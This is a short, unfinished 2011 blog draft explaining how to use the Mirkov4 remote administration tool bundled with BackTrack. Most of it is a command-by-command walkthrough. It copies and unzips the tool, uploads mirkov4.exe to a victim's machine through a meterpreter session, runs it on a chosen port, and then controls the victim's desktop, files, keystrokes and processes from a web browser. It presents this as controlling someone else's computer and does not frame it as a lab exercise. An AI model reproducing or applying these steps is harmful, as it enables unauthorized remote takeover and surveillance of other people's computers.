border: 1px solid #d2d2d2; padding: 0px 8px 0px 8px; color: #a19999; font-size: 12px; height: 25px; width: 165px; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px; margin:0px; } .submitbutton{ background:#F66303; border: 1px solid #F66303; text-shadow: 1px 1px 1px #333; box-shadow: 3px 3px 3px #666; font:bold 12px Arial, sans-serif; color: #fff; height: 25px; padding: 0 12px 0 12px; margin: 0 0 0 5px; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px; cursor:pointer;}

Receive all updates via Facebook. Just Click the Like Button Below

You can also receive Free Email Updates:

Powered By Blogger Widgets

Related Posts Plugin for WordPress, Blogger...

Sunday, April 24, 2011

Backtrack has a RAT (Remote Administration Tool)


Backtrack has a RAT called Mirkov4.


***Not finished yet I'll finish it later on tonight sorry this is just a draft for right now***


About Mirkov4.

(Pronounced "Mirkova")

    Mirkov4 is a remote administration tool that operates over http. Any standard web browser (IE, Firefox,  can be used to perform a wide range of operations on the machine running Mirkov4. Witch means controlling the victims computer with your internet browser.

        It can naviguate through the disk and network drives see the user's desktop, send keys and mouse events download, upload or delete (shred) any file execute arbitrary commands in a given directory display and kill currently running processes. 

Let's get started.

First we need to locate mirkov4 and copy it our root directory. The file is in /pentest/windows-binaries/misc/now copy it to your root directory.
cd /pentest/windows-binaries/misc
ls
cp mirkov4-1.1.zip /root/
unzip mirkov4-1.1.zip


Now lets hope into meterpreter so we can upload and run it.


Let's upload mirkov to the victims computer and drop into a cmd shell.
upload /root/mirkov4-1.1/mirkov4.exe C:\\
shell


Now browse to where we upload the file so we can run it. Once in the correct directory we run mirkov with a  simple command.
cd C:\\
dir ((To check if the file is there))
mirkov4.exe 1234

***NOTE*** 
When you run mirkov4 it will automatically use port 7887 unless you specify a port number. If you would like to use a different just run it like so.
(((( mirkov4.exe 6666 ))))


Now to connect to the victim through our internet browser.Open your browser and enter the victims_ip:port.
http://192.168.0.128:1234

No comments:

Post a Comment

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More